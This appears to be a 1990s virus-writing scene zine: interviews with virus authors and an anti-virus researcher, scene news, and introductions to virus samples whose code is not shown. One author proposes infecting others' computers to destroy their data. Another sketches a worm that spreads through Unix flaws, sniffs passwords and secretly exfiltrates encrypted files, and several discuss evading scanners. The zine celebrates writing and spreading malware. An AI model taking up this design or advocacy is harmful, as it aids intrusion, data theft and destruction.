sure, some have changed. i mean, now they are talking to each other instead of just name calling. i think i played some role in that. well, i know i played some role in that. but my 'role' was just to initiate change, as some form of catalyst. don't you know, usually the catalyst gets burned the most :) there is now more examination of facts, instead of hype and hysteria, related to virus writers. i know i played some role in that. all in all this examination is good, for both sides of the discussion. i think virus writers are now thinking and talking more about what they are doing and want to do, and realising the impacts of releasing their creations. im told i have had some role in that. but i dont know. i hope i did. but it could be natural sequence of events. maybe i just recorded/documented it. maybe i made some change by doing that...i don't know. i know personally i have had some impact in the overall dynamic, but how much and how to measure is difficult. many times now im quoted about what ive learned by just talking to people and analysing facts about how viruses really spread. hopefully this has some effect on getting the media to focus on real problems. but virus writers and things related to them are just a small portion of my work. ive done more in product testing, certification and network security. however, it is the 'virus writer' work which seems to grab some attention.

something you have written/worked about that has been misunderstood?
sure, this is always the case with everyone isnt it? havent you? :) in particular, i remember when phrack wrote some story which they later said 'we're sorry, we didnt check this out thoroughly' about my trying to shut down some bbs. its true i was in a room when someone suggested that some bbs should be closed, but if i remember correctly, i suggested this is not a very good idea... then, there was that ugly silliness the virus writer kohntark made up. i never did figure out why he did that, but he seemed to have some stuff works, just like it is cool to know about other computer actions and who can argue with you? not me. but there is no 'magic' or technological 'excellence' in this stuff. its not 'new science'. its not any way to get a good job. what it can be is some very costly pastime. there can be a big price to pay -- you can really hurt someone with the viruses, because you can not guarantee that you can control the viruses. people will say you cant *really* hurt anyone, but they are wrong. so please stop and think what you are doing. if you are the kind of guy who wants to hurt them, then you deserve what you may get if you do it. [how many words was that?]

about your article "the generic viruswriter", the four persons you selected for the four groups, who were they? (if you can't give this out, don't, but motivate why.. ).
sorry but that is confidential to them. why? i told them it will be confidential unless they tell me otherwise when i asked for people to respond to the survey.

which virus-related article is your personal favorite? (why is that..).
general systems theoretical model for av protection (if you mean my own). it is favorite because it allowed me to work in a new area. or do you mean in general?

what, concerning virus-related stuff, have you regretted in your life?
i regret that i did not realise the personal dynamics of my relationship with the virus writer formerly known as dark avenger, and that i was sometimes too concerned with my personal life to give attention to him when he needed it. but it was really wearing me out, and i actually got physically ill from spending too much time with all the work. i did not realise the impact this all would have on him, or on me. it took a lot of my time and attention for several years. i have written a lot about how we dont realise the impact of our actions on others, since the computers can tend to desensitize us. unfortunately, i was not 'immune' to this.

do you prefer tea or coffee in the morning?
grape kool-aid (dont you attend defcon? :)

your favorite dish?
prawn crackers, any hot chinese dish with chicken.

what're your hobbies? (umm.. one hobby.. many hobbies??).
hobbies? i think you need spare time to have those.. i used to sail and did at one time train and ride my own horse, but i had to give him away when i could not afford to keep him. i also dont have my sunfish sailboat anymore. i have recently tried to do some oil painting, but lost interest in it. i guess i dont really have any hobbies. do you?

who did you vote for in the president election - 96?
i did not vote.

do you think the "virus-infections-problems" will die out and fade away with the OSes getting more common, dos losing ground, etc? and in how long time if yes..
i think this depends on how you define 'problems' :)

you sell f-prot professional, what other av-products would you recommend for the average user?
the 'best' product for any job depends on the needs of the user as well as the product. any product which is wildlist compliant is a good 'starting place' for the user. from there, he will need to factor in his individual needs.

about f-prot pro & not-registered, what are the differences?
i did a comparison for the Command web can see the differences there! (can you tell i'm getting tired? :)

how does your typical monday-friday day look like? (are you satisfied with your current life?).
get up. drink kool-aid. (ok, coffee:). log-on while drinking coffee. answer mail. answer questions about viruses :). answer more questions about viruses :). (answer this mail). look at viruses :). look at more viruses :). try to spend some time researching new topics. answer more questions about and look at more viruses (usually macro viruses). am i satisfied? no. are you?

what plans (irl/computer) do you have for the future?
irl, i want to buy a house and a dog :) have a garden and volunteer some time someplace meaningful. for computer, i am thinking maybe ill write some new software, maybe automate some tests which take a lot of my time now, and probably design a new CSecurity model.

do you prefer a dog or a cat? (not for dinner.. pet :)).
hey, how did you guess? i have a cat but he lives with my friend. i could not bring him to florida. he loved his house too much. so now i dont have any pet. but hope to have both. well ..since i wrote this, i have bought another dog, he is not yet named, and is still at the pet store ..but i will be bringing him home soon. [since i wrote this (yet another edit :)), the dog from the pet store got sick. so we got yet another dog. our third. this one we named 'lucky'. i hope he is :)]

about viruswriting groups, a lot of us have faded out and died recently, anything you want to say to them or to the ones that still remain?
i'd be interested to talk to anyone who wants to talk seriously about viruses.

do you consider viruswriting to be a perverted hobby?
never did. waste of time. probably unethical from a formalised ethical modeling point of view (if you're Kantian :). can be illegal. but perverted? thats funny :) . have you seen the Internet lately? lets keep things in perspective. i work hard to help users avoid problems from viruses, and feel people need to take active steps to help stop virus distribution. im against indiscriminate virus distribution, and think that as a society we should not overtly or tacitly condone it. but there are far worse problems facing our society. this is not to say viruses are 'no problem'. they sure are! but in the 'big picture' there are far worse problems facing computer users and society in general than the viruses we are seeing today.
it is the viruses which i have chosen to fight, and i wont stop fighting against them because it is wrong to make software which hurts people or which has the potential to hurt people. computers should be used for helping people, used for good ethical purposes. now, can you and i talk about why you write viruses and distribute them in your magazine? because i think it is wrong. you can argue that what people decide to do with them is their own business and not your fault, but actually if you didnt give them the viruses, you wouldnt have a role in their using them for bad. as it stands now, you are partly responsible for what they do with what they do with your creation. why not create something which uses the computer to help people, something they can chose to use and thank you for instead?

IRL papers

I've seen a lot of write-ups concerning computer viruses lately but since they're all in Swedish and me being a bad translator, I'm sorry I didn't translate them all for you. If you know some Swedish though, the page to be on is: (or .html dunno). One article called "Virus Buster" is located on (or .html dunno) which features a picture of Klas Schöldström (S&S Sweden) "which makes life hard for those who got the idea to create and distribute computer viruses" (He's definitely geeky looking, check for yourself!).

Some quotes from that article (published in Computer Sweden #77, Friday the 6th of December, 1996) follow here (scene-person related, go bitch on him or so..). "Last spring, the virus Boza came, that was the first virus for Win/95. But it sucked. It can only infect files in the same directory from which it was executed and it fails doing it sometimes. It was, though, a media hype (or PR trick) from the virus authors to be first with a 32-bit virus". (Now, he also disses the Hare virus, claiming it only halts the computer, and that he considers macroviruses the real danger..).

Furthermore, they write (which could be interesting in this zine ;)). "Klas considers a virus named One-Half to be among the most naughty ones he's ever seen. - At the occasions I've seen a virus spread itself to many computers at one time, it's One-Half, he says. "It's made hard to detect and has no bugs. It places itself on the "partition-sector" (direct translation - tu) and slowly starts to encrypt the harddrive. When half of the hd is encrypted the message "Dis is one half. Press any key to continue" is displayed and at that time, also back-ups are encrypted." (Klas starts his sector-editor (which he wrote himself!) and takes us on a journey through One Half and its functions.. w-o-w- ;)). (Now, he says we're all kids who seem to love computers, yet are trying to fuck them up and thereby are really hating them..)

.SE top 10 wild list
Junkie.1027 (boot/file)
Form.a (bootvirus)
Antiexe (bootvirus)
Beijing (bootvirus)
AntiCMOS (bootvirus)
Grangrave.1150 (filevirus (Burglar/H I wrote av against btw! - tu :))
One-Half (boot/file)
WM.Concept (macro-virus)
Empire Monkey (bootvirus)
Ripper (bootvirus)

Well.. In case you're interested!


Since I forgot to include this code in the VLAD April fool's edition, here follows [Push-Up] (v. early beta!) written ages and ages ago by someone who surely indeed will turn red-hot-chili-red when seeing this ;). The code is as unoptimized as can be ;) and there are labels and checks w/o corresponding code :-). Double-code inclusion is included for your own sake! You -should- be able to optimize this and feel like an asm-wiz! As is shitty old tradition, we supply you with unfinished viruses for you to modify and claim as your very own creation!

Also, as we say in Sweden "a laugh extends your life", so... I guess you'll be like really old after looking closely into this one.

Anyways, the basic thought for this virus was good since I consider a bs/mbr/com/exe semi-stealth virus an alright replicator. The virus should work, but I guess that's about it, probably not perfectly under all configurations and stuff.

Gimme more cheese please

This virus is *really really* old and is for me hysterically funny to look at. If the author of it, who wrote it in 93/1994, remembers it, please write me an email! (I hope/think/believe you don't mind it being included here ;)). It lacks some byte optimizing but the overall quality is alright, though, concerning the coding style. (Now, I can nag on this, when I received it I didn't understand anything and the author teased me like shit ;)). Well, it's a resident COM infector w/o any other functions or payloads, works really well on my machine.

Eugene K

Well, I'm a big fan of AVP and its graphical section of viruses so here follows a gfx payload which is a sort of "remake" of a fire effect. Finally Eugene did include (what he called) "Riot.ir8" (a virus with a gfx effect), and this is just to see if he will include the virus below too. The virus follows as a hex-script below this very slow effect named GrayNuclearSky. Don't enjoy.

The LifeWire virus

About a 220 byte .exe overwriter ;) of EXE-files which F-prot doesn't detect for unknown reasons. It has two activation routines, one graphical and one standard which itself claims to have some self-modifying code along with some nifty TSR routine. Of course that routine is a damn liar. The first one will blow on the second of November any year from 1997 (RTM Worm day). The second one will 'go off' on a random basis. This virus wasn't meant to be a serious virus, simply a demo-virus (haha) for the demo routine above. Furthermore the text strings
"[LiveWire GFX] " "Hiya, Robert.. !"

are visible in trojanized files.

Side-effects the conversation way

This was supposed to be a short summary of what good side effects viruswriting might have. I can't exactly say what you consider being a positive effect of something, but most stuff thought of is negative, which of course leads us to a position where it's hard to motivate viruswriting. This means that this is an important issue to deal with if some of your irl 'friends' all of a sudden start wondering why the fuck you're doing it and you'll have to defend your rights.

Well, you probably have thought about a few good reasons yourself, if you need reasons that is. I said I couldn't give any good reasons for viruswriting, as stated in the interview published above ;).. Hm, that is definitely simplifying it, but for a time it's a fun thing to do.

Fun? Is it fun to write something with evil intention? Is it fun to make a bomb?
Well, bombs are interesting, but please don't compare those things. When I said "fun", I meant "interesting". Yes, it is interesting to program things. It's interesting to develop code with a unique capability - to self-replicate. It's interesting to meet other people similar to yourself and it's interesting and fun to see other people's solutions and learn from them. The coding itself is just a must to be accepted by the people who I talk with.
But why viruses?
Well, do you find any other programs that have the same impact on users as viruses? It's fun to know much about something that not too many people know much about.
So.. it's all about having respect then?
No, it's not. I won't discuss this with most people, only with those who're concerned. Plus, I like having knowledge if some smartass needs to be "taken care of", but since I dislike physical violence, I find my computer skills somewhat useful.
So, then you distribute your code to people you dislike?
No. I didn't say you did now, did I? Defence is easy. Just bore them to death and voila, you'll win.
The conversation above *was* boring and due to that, I won't write anymore on it. The conversation above wasn't about side-effects at all. Gotcha. As stated somewhere, stay tuned and it will be presented. Not here though. Ha-Ha.


Recently, I've seen a lot of zines/groups popping up while some have faded away. Well, some say the scene is dying but I think not. Only the "good old virus groups" are. Rabid is dead (hehe!), P/S is, NuKE is RIP, YAM, TridenT, DY, VG and so on are (Not much of news, most people don't even know about some jam ;)) but! there's 'always' new groups coming up, some of whom are really good.. and yea.. Immortal Riot is still around and will be for quite some time.. Don't expect a fade out!

The funny thing with virus-groups is that we do release a shitload of zines. A short summary of the scene-zines might be in order here (If I've forgotten one or two.. that is only because I'm tired, but since I dislike sleeping... deal with it).

From what I heard, P/S died and won't put out any more 40hex issues. Well, most 40hex zines did include things one still can look at and learn from, so if you miss them, re-read and study an old one :).


It's sad Qark and Quantum gave the entire virus-thing up, but we'll see what Darkman (who has been outta it recently) can do with it. I miss them ;) seeing my name appear in the greetings in each issue (hehe!) and those games included. After Metabolis gave up VLAD they lost a little of their "personality". Qark was very good as organiser, too bad (for us) he got tired of it and decided to drop the entire thing. Good luck in life guys!

After our merge with Genesis we finally brought out an issue and in my opinion a very interesting issue, too. Besides the overall code quality (maybe too high for most) it included a lot of other good non-coding material. Thanks are due to Dark Fiber for doing a lot of work for us! Also worth mentioning is that Sepultura and Rajaat put a lot of effort into doing it as well as possible. I heard people complained and gave us negative feedback, yet I can't understand why. There isn't much news in IRG (that I know of anyways); issue #9 is under development and you can, if you consider yourself worthy, contribute to it. Expect to see a high quality issue!

A Vlad-stylish group from Spain(?) that I wish good luck in the future. Had some interesting things in issue #1 and we can always hope it remains stable and evolves.

Issue #1 isn't really worth bitching on here. But, it's a first issue and I won't bitch on newcomers. We all started somewhere...

Does contain a lot of complex & interesting stuff. Maybe better commented viruses would increase the "overall quality" though. From Russia with love :).

DC is gone. Might have formed another group called RSA. Can be interesting to see what Wild Worker and co. can do with his crew (RSA). (I know he wasn't "pres" but he should be).

Good luck guys! I surely will enjoy reading this zine! It's quality (besides this article!) people expect from you. Hope there will be an issue #2! [ Actually, this zine is not SVL's one, moreover, it is not a group mag at all. Additionally, we would like to stay an intergroup zine :) ]

Has been dead for several years now, still there are some newbies on irc asking for VCL2. Don't do that, it's annoying as hell and you'll most likely be kicked or banned two seconds after you've pressed enter. So read my lips: NuKE is dead!

Seems to be an interesting group, including b0z0 and guys. They did contribute to Insane Reality #8 and Sailor Moon is an interesting virus.

Dunno if the spelling is correct or not ;). They should write their stuff in English though if they're around (haven't seen much lately though).

So.. there's actually a shitload of groups out there, producing code. Hang around long enough on irc #virus and you'll see them sometime.


There's so many people to greet really. I would like to thank everyone who has been there for me, on the irc, on email and on the phone. Further greets go to anyone who won't take this contribution seriously at all. I promised to include something and I try to keep my promises. ok? Thanks to all I have ever done a /msg to, and yea.. IRG guys.. keep it up!


The Unforgiven. - Main article writer. Well, that's it (if not specified somewhere else).

Goodbyes and cya somewhere.. somehow.

Vlad.Au. Keep on emailing me.

Quotation & Poetry

Just read my mind and find the complete guide to insanity. Should be trivial if you belong to the Second Foundation. Personally I dunno what choice I would make. First, Second or Gaia.. Hm, tricky.

But.. who really wants to make choices. That sucks. I just want it all :).


I will continue hanging on the irc, writing my stupid articles and just floating around being what I've been. Really, I'm so satisfied with what Sepultura has done for IRG, so consider him in control. If you found this article chaotic, you're right, that was the idea, if I might add that. For IRG, the future is as bright as always.

Happy Valentine and 1997. The Unforgiven.

Interview with CoKe of VLAD

People, this interview is the only online interview in this issue. In all other cases I sent the questions to the ppl and just waited for the reply. If this interview sounds rather strange, nevermind, excuse it, I interviewed _CoKe_ at a very unhealthy time. If I remember, it was about 6.30 am when we started. And at such a time, every normal European programmer sleeps... For some 1 or two hours...

Coke, try to introduce yourself....
Hehe.. Well, my handle is CoKe, comes from Coca Cola, not from cocaine.. :) It's my first and only handle. Good enough? :)

So, the next question, a really difficult one: When did you start to do somethin' with computerz?
Phew.. I was 10 or so when I got my first PC.. 8088 XT with Hercules graphics card... Since most of the games were CGA only I started to code in BasicA and GwBasic to write my own games... :) That makes 13 years now.

The coder was born.... but, in my humble opinion, the gamez and virii 're kinda different, or am I not right?
Of course. But I wrote my first "virus" in QuickBasic 4.0 some years later... On execution it got the current EXE name from the commandline, did a shell "dir >file.txt", opened that, and overwrote the EXEs in the current directory with a copy of itself.. heh

Soundz like a good start, but to go resident in a HLL is a right difficult task. So you had to switch to the right language - to the assembler...
Yeah.. I was too limited in Basic, so after a while, I switched to C... And to make some small routines faster, I used a bit of assembler to speed things up...

So your destiny was to become an assembler expert and viruz coder after all the switching....
Yeah... I always found viruses quite fascinating.. Biological AND computer viruses.. So I grabbed some interrupt list (Not Ralphies), TASM, and started writing a non-ow com infector.. That actually took me 2 weeks of non-stop (night)work.. Another week later, I wrote a remover for it, since my friends playing and copying everything from my system got all infected.. hehe

I know that situation. Non-ow com infectorz are a good start for a coder, but you didn't stop at this level of code, I know... And that nice story with the remover... Didn't you think of launching some kind of AV biz?
My first EXE infector was months later.. I first had to get Internet.. There I found an IR mag, called up their HQ, and got in touch with The Unforgiven and Metal Militia.. So I got more and more info, and got into work for my first EXE infector.. :) At that time I sent all my sources to Metal Militia, to discuss them over.. He was an idol at that time.. I thought about becoming AV for a time, but quickly realized that the AV was a commercial thingy, and directed by a few ppl. So I dropped the idea again... Especially after I got in touch with qark.

Qark is (was?) a really very productive coder, and of course, a VLAD member. And to code alone, without being in any group, is not such big fun....
Exactly.. From the IR HQ I polled NukeNet, and posted some mails there... One day I had an email from qark inviting me to visit #virus, which I did.. He immediately put me on the Bot (LamerBot)... I coded some more stuff, and I gave one of them to VLAD because I wanted to join.. The votes were in my favour... fortunately.. :) hehe.. The funny thing is that the virus I gave them was buggy... But that's an old VLAD tradition.. hehe.
[...I always used to say "It is not actually a bug, but only some minor compatibility problem with hardware... :)"...]

So you landed in VLAD. How was the feeling of being a member of such an elite bunch of geekz?
I was VERY surprised... Because I became a VLAD member some weeks after I applied for IR membership.. I got refused because I was non-Swede (No kiddin').. That depressed me a lot.. :) Becoming a VLAD member was something I didn't even dare to dream about.. :) I remember the day when the votes were finished, and Metabolis said on #virus: "CoKe is now a VLAD member"... Guess that was one of my happiest days.. :)

And can you say what is the true reason of VLAD's death?
First of all VLAD is _NOT_ dead...

??? All the people 're saying "VLAD is dead and issue #7 was the goodbye issue"...
That's not correct. There will be a VLAD #8... 100%...

That means....???
Well, it means there will be a VLAD #8... :)

And who is continuing in the tradition?
Darkman, me and [XXX] heheh... Qark and Quantum left VLAD because they were in the biz for too long I guess...

They both did remarkable work, so I guess they earned that pause. :-) Let's get back to the main topic, the viruses. What's your best virus, what's your most favourite virus... And what virus, in your opinion, was somewhat innovative lately?
I like all my viruses, and have absolutely no favourites.. Each virus is a mirror of my knowledge at that time, so I like them all.. I think my most innovative is Obscurum which is a COM/EXE stealth/res/poly that has got some neat tricks to hide..

And some really good viruses by other authorz?
I think the most impressive virus of all time is BIZATCH, not because it was done by a fellow VLAD member.. Bizatch kicked Bill's ass.. :)

I agree, but all the AV humbug about naming it Boza was really disgusting.
Yes. I still don't quite understand why that shit.. Probably some kinda revenge.. A really LOW level revenge..

BIZATCH has shown that W95 is a piece of shit, but actually, we all knew it for a long time. So now I would like to ask you about your planz for the future. As a coder and of cos also in general... new OSes, new viruses, new trendz...
Yes.. I loved OS/2, but due to a lack of software, I almost HAD to switch to WIN95, just like thousands of other users... I hate Bill for that.. OS/2 was much better, and WIN95 only made it because of a HUGE publicity work by Mickeysoft.. My future.. Oh my... I'll do more viruses, and we'll try to get VLAD up again.. :)

Microsoft, how can something be good if it is produced by someone with a small and not hard (e.g. dick :)... btw, we have here such a club - M$haterz and ALT-F4 club
I like that ALT-F4 club.. hehe where can I join? :)

Would you like to contribute to the greetingz section and to the fuck you section?
Greetings to Qark, Metabolis, MMIR, TUIR, Blonde/IR and Skeeve. Fuck-yous go to: All the lame irc-warriors.. Oh yeah.. and greetings to Sokrates as well.. :)

Okay, wish you good luck and all good in your work.
Thanks.. :) And don't forget.. VLAD is not dead... :) I'd be grateful if you could email your mag to me..

That was Coke exclusively for *zine, thanx for interview... and remember...

VLAD is still ALIVE!

Interview with Wild W0rker of RSA

Wild W0rker is one of the regulars on #virus. So I decided to ask him for an interview. Here I present the resulting textfile.

Can you introduce yourself?
I am Wild W0rker, Ukrainian virus writer and RSA member born in 1937 :). I have a girlfriend (but maybe she is my wife already, coz i don't know when this mag will be released :).
[ Wildie is a married man for some 2 or 3 weeks now :). Here you can see how lazy I am ... ]

What is RSA?
Ruthless Stealth Angels (RSA), that's a Ukrainian virus writing group. BTW we need good coders:), if you are a good coder and wanna be an RSA member, email me to or

Why did you choose the nick Wild W0rker?
Dunno:) I was drunk when i selected it:)

When and why did you start to be interestin' in computers?
I've seen the computer for the first time 6 years ago at the school. It was a soviet computer and looked like a refrigerator:). I love refrigerators with products, that's why i love computers:) ( joke :) [ I know such computerz :) ]

Your first contact with virus...
When i started work with computers, one virus formatted all my disks... That was my first contact with viruses:) [ Hi boyz, who coded that Anti WW0 virus? :) ]

What about your first virus?
Heh, i made it one year, it was a resident com infector. It was a shitty virus, you know what a first virus is:) and i rm'd it.

Virus as weapon ( bunch of paranoid geeks like NSA,CIA,DIA,SIS 're asked to skip this question and answer)
Well if you have problems with some ppls you don't need to use a gun... You can infect their computers and destroy all information on it... maybe after that these ppls will use a gun for suicide:)

Your favourite virus and why
Hmm i think Zhengxi is it, coz it can infect everything, has a good polymorphic engine and many other nice features:)

Your favourite antivirus program and why
AVP, coz it has good polymorphism detection, not bad speed, xcellent virus descriptions. (and it can be fucked... look at 29A#1:)

Vx coder you would like to meet personally and why
I'd like to meet all vx coders who can drink not only juice:)

AV people you would like to meet
i don't want to meet AV ppls.

AV name(s) making you puke :-P
no one:)

Are there in your country some laws against viruses and their authors?
Maybe that's funny, but i don't know:)

What do you think 'bout maniacs who want to bust and prosecute us, the vx coders, and would like to erase the vx scene?
they are idiots:)

Your plans 4 the future as coder and in general...
Well me and my friends (RSA members) will work on dos/win95 viruses and we're trying to make an undetectable virus...

Last but not least: can you point us to some interestin' online resources on the internet?
- that's a nice vx archive [ unfortunately, shortly after the zine was released, the server of the Information Liberation Front went down and never reappeared. Another mysterious case of a disappearing server ... ]

So Wild W0rker, thanx for the interview. And keep writing viruses. And don't worry 'bout being married :-P

Interview with Sepultura of IRG

So, in line with this policy, I decided to interview one of the IRG leading personalities, Sepultura. Although I had some technical problems at the time [ Sep knows :) ], here is the interview. Enjoy it!

Can you introduce yourselves ? Im Sepultura, born 1979, from Australia. Im a virus writer who is a member of IRG (Immortal Riot/Genesis) and do a lot of the organisation that go's into IRG's magazine Insane Reality. The only thing I like more then viruses is music (Sonic Youth, Front 242, Sepultura, and Beethoven are among my favourites). Actually I like copious amounts of buds and lsd more then viruses too. When and why did you start to be interestin' in computers ? I was never interesting ;) (so stop reading this interview). When I was 6 my mum bought us a Commodore64. I learnt BASIC and by time I was 7 I was very proud of this 'guess the number' game I made. I spent a few years playing with the C64, but as you can imagine I got quite bored with it soon. Then, when I was 12, some teacher let me muck around on the school's computers while the rest of my class was doing maths (since me and a friend already knew it.. infact all of IRG have IQ's over 200). Me and my friend made this game to test peoples multiplication tables and stuff, but the school never used it, as it flashed random insults and was quite abusive to the user if you got the answer wrong. This re-kindled my interest in computers and I nagged my mother who bought a 386dx in that same year. (This was the computer on which my virus writing started). Your first contact with virus ... For some reason I cant explain, I became very interested in viruses (aged 13, 1992). I didnt have a modem and knew no coders, so I had no idea what I should do. I met some lame fuck who told me viruses were written in C.. so I learnt C and after learning C still had no idea what to do (I didnt even know what a virus really does.. I just knew it replicates). Then I got vsum and it seemed to describe what viruses did in some detail but I had no idea what it meant (what the fuck is Interrupt 13h?? =)). Then I got FProt and somewhere in its documentation Fridrik Skulason mentioned any average Assembler coder could make a virus.. 
now I knew I shouldn't have learned C. Finally I gota book (this is late 1993) called 'Undocumented DOS' that told me about thing like Interrupts, segments, file I/O, and MCB's. It also had example programs written in ASM. I learnt

ASM by studying these programs and by playing around in DOS debug. At this stage I was ready to write a virus. Beetween here and when I had first become interested in virus's I had never actually seen or had contact with a virus. What about your first virus ? Well.. just after learning ASM (or DEBUG ASM more precisely) my friend got his machine infected with a virus called Slow (an encrypted 1721 byte Jerusal variant). I didnt have an assembler or disassembler (I didnt even know you could get disassemblers) so I studied the virus in Debug. I decided it was very badly coded, and wanted to make some changes, but I didn't even know how to change the length of the virus (so I had to modify it *and* keep it at 1721 bytes). The result was a semi-polymorphic virus with text strings and an actiation routine. That *could* be my first virus but it was only a hack. I didnt write a virus for a while because I didn't have an assembler, but finally I decided to write it in Debug. This involved writing the entire virus in Debugs (A)ssemble mode, printing out the (D)isasm listing, looking for errors, re-doing it over and over again until it worked. The first virus I did was Sepultura Boot.A which I spent an entire evening working in Debug on. Then some TSR .COM infector (I worked out how to go TSR by reading the doc's of an AV program called Stealth Bomber). Then my friend got a modem and I begged him to find me an assembler, which he did, and then I was free to write viruses as much as I wanted. You started as an independent coder, but after your massive support for Insane Reality #7 you landed in Immortal Riot. Tell us the whole story OK.. here comes more of my life story =) Mid '95 I got a modem and a carded OzEmail account. This is when I was first introduced to the virus scene. I met some guy called Qark, from VLAD magazine (which I read after FTP'n it with my schools inet account which I 'socially engineered' the password too). 
He was a nice guy and when I told him I was a virus coder he asked to see some code, which I showed him and he ended up sticking in VLAD#5. This is when I realised other people might actually care to see my code. So I coded more and gave it to The Unforgiven (TU from now on) for IR#7. It turns out I donated more then average and people were impressed. Late in December '95 I joined VLAD but this didnt last long. There was a new group called Genesis, but after leaving VLAD I didnt think I should ask for membership in it as it would look like I was group hopping. Februrary/March 1996, and TU told me IR was now an open group and I could join, so I asked if I could, and I did. Then (perhaps cos I nag too much) TU let me do a lot of organisation, and I ended up organising IR#8. And thats the whole story. Perspectives of polymorphism Traditional polymorphism (with a static virus wrapped in a highly variable decryptor) is a dying concept in my opinion. With the advent of generic

decryption, polymorphism is not really much of a threat to the scanners any more. I think the future lies in the 'metamorphic' viruses. These are viruses that are not encrypted, but the code of the virus itself changes. These include viruses such as PLY, Win.Apparition, TMC, and Swap. If we imagine metamorphism in the future reaching a stage where the only thing two copies of the 'same' virus have in common is the algorithm (or what actually they do). This can pose some interesting problems. Lots of 'different' viruses use exaclty the same algorithm, so if a virus that modifies its code comes out is it just creating a new copy of the same virus, or a new virus? And really, detecting a virus just by looking for code to perform a certain algorithm, is what is used for heuristic scanning today, so when detecting a truly metamorphic virus, you are likely to detect a lot of completely unrelated viruses - how can you identify such a virus? [ TMC hex dump can be found in this issue of our zine :P The source 'll be released only after all the major AV vendors 'll detect it. IMHO, they should have their job as hard as possible for their money :))))) Ed. ] Perspectives of stealth Stealth is a problem. Stealth stops the user noticing the virus, but to do stealth, you must be able to identify the virus and find the nescessary info in the virus body. This defeats the purpose of polymorphism. I think in the long run, good polymorphism is a better option. I don't like viruses that are to desperate to be 'stealthy' that they sacrafice compatibility, like DIR-2, Assasin, and No. of the Beast. Virus as weapon ( bunch of paranoid geeks like NSA,CIA,DIA,SIS 're asked to skip this question and answer) The kind of viruses we deal with (80x86) are not much of a weapon in my opinion. But I think viruses could be used as a weapon. Imagine a multiplatform virus (perhaps a Unix Shell Scipt), that exploited many Unix (and Unix variants) security flaws, and spread over a TCP/IP network. 
This is very similar to what the Robert Morris internet worm did, but it would have to be updated for newer systems, and shouldn't replicate till the machine crashes. The virus could then perhaps act as a sniffer, monitoring Ethernet activity looking for logins/passwords to other systems, to continue its spread. Furthermore, the virus could even search through (for example) any file, looking for the phrase 'U.S. Intelligence', and if the phrase was found, compress the file and send it to some barely used public FTP site or mail the file UUENCODED to some obscure USENET newsgroup, for the creator of the virus to download. Lastly, the virus could use a public key encryption system (such as RSA) - the virus would contain the public key, and encrypt the stolen (and compressed) information with it, so that it could only be decrypted by the creator of the virus, and people would not realise these junk files on the FTP site or USENET group contain anything unusual. If this was done well, it could be quite an effective intelligence weapon. (And we at IRG have done it, that's why we know everything about everyone).

As an Australian dude, can you describe local virus scene ?

The Australian virus scene is quite healthy. Lots of solo virus writers have come from Australia, such as the Gingerbread Man, as well as quite a few members of NuKE, IRG, VLAD, and the AIH. As far as the international virus scene goes, I think Australia is quite prominent in it (Slovakia, Taiwan, ex-USSR, and Australia have all extended 'virus technology' quite a bit). On a more local level, the virus scene in my state is reasonably healthy too. Two IRG members live in this state, as well as a few lesser known virus coders. There are also 5 BBS's that I know of in this state that carry virus related file and/or mail areas.

The same stuff as previous but AV

As far as I know, Leprechaun Virus Buster and Cybec's VET are the only two Australian AV programs. They both suck completely and are not even worth mentioning.

Your favourite virus and why

I don't have a single favourite virus. My favourite viruses include:

Tremor, Havoc, N8FALL: Neurobasher was cool, if you consider the time at which his viruses were written. It is almost like he made a list of all threats to viruses at the time, and then made viruses to address these threats, 1 by 1. For example, the heuristic scanners (which were just coming out when he was around) detected suspicious date stamps, so he started using size padding instead, and modified his entire set of full-stealth routines to accommodate the variable size. In my opinion he is the king of retro-viruses - his were really the first ones to make strategic attacks on the AV programs.

Level3, Onehalf: Vyvojar's viruses caused many problems for the AV as well. Lots of scanners still can't detect these two viruses reliably. TBAV is even stupid enough to claim you should clean Onehalf with FDISK /MBR ;). Level3's engine is very complex yet is very logically coded.

Natas: Priest's code is very clean and error free, which is sadly something most virus writers (including myself) lack.

Phoenix, Commander Bomber, MtE: DAV's code is fucking crazy. Hardly anyone I know can even understand the structures used in his viruses (especially MtE and Bomber). He's also the 'number theory in viruses' king.

TPVO: The TPVO viruses are excellent, strategic, and very cleanly coded. So are Dark Slayer's engines. Dark Slayer is one of the best currently active virus coders in my opinion. Level3 and DAME are both worth looking at just for their very sturdy and logical code.

[ Well, as for One_Half, check out its original source code in the mag. First time ever published stuff :-P Ed. ]

Your favourite antivirus program and why

AVP would probably be the best overall program (it has excellent known virus detection and cure, CRC checking, good heuristics, and good decryption). F-Prot has good known virus detection/cure. Dr Web and DS-AVTK have very good emulators. I do not know what methods ICE-NOD uses, but it is very good too. Suspicious... I barely consider this an anti-virus program, it's much more like a set of diagnostic tools. Apart from the fact that it doesn't have the best decryption, the reports its heuristic scanner SSC gives are very detailed. Often, when I receive a new virus sample, instead of analysing it manually, I just run SSC over it and read the result. I use AVP, AVG, DS-AVTK, ICE-NOD, F-PROT, TBSCAN, DR WEB, and SUSPICIOUS to test my viruses.

Vx coder you would like to meet personally and why

Just because someone is a good coder, I would not want to meet them; having a technical discussion with them over the phone/IRC/mail is enough. I have met DV8 before (the guy who coded Mr Klunky) and he gave me beer, so I guess I wouldn't mind meeting him again. I also would like to meet any other virus writer that would give me beer. I'd like to meet basically all of IRG.

AV people you would like to meet

Stefan Kurtzhals, the coder of F/WIN and Suspicious, is an excellent coder and has a lot of technical knowledge, but from the discussions I have had with him I think he's fucking crazy, so I wouldn't mind meeting him. Also, any AV person who will give me beer. Mikko Hyponnen/Eugene Kaspersky and occasionally Alan Solomon seem to make amusing jokes (and like beer). Sara Gordon/Vesselin Bontchev/Jim Bates, so I can spit in their eye (and steal their beer of course).

[ Sep loves beer :) , i can promise if I 'll ever meet him, he gets some beer from me ... But basically, he should fly to Europe .... As 4 Jim Bates ... He deserves much more than such a lenient treatment. We should try to use Magic Bullet (tm) ... Ed. ]

Are there in Oz some laws against viruses and their author?

There are no laws against writing viruses as far as I know. Spreading them is a different story. Laws were made to be broken anyway.

What do you think 'bout maniacs who want to bust and prosecute us, the vx coders and would like to erase the vx scene ?

I don't think about them. They don't matter, and they will never succeed. We can simply ignore them, and they will go away. (But others will come along to take their place, so we just keep ignoring the ignorant masses).

Your plans 4 the future as coder and in general

No idea. I'm currently looking at infection of the new executables (NE/LE/PE and LX) as well as metamorphic viruses. Besides viruses I like playing with cryptography and computer security in general.

Last but not least : can you point us to some interestin' online resources on the internet ?

(IRG homepage)
(Lots of Stuff)
(Lots of Stuff)
(Virus Encyclopoedia)
(Virus Bulletin)
(AV papers)
(LOTS of AV Programs)

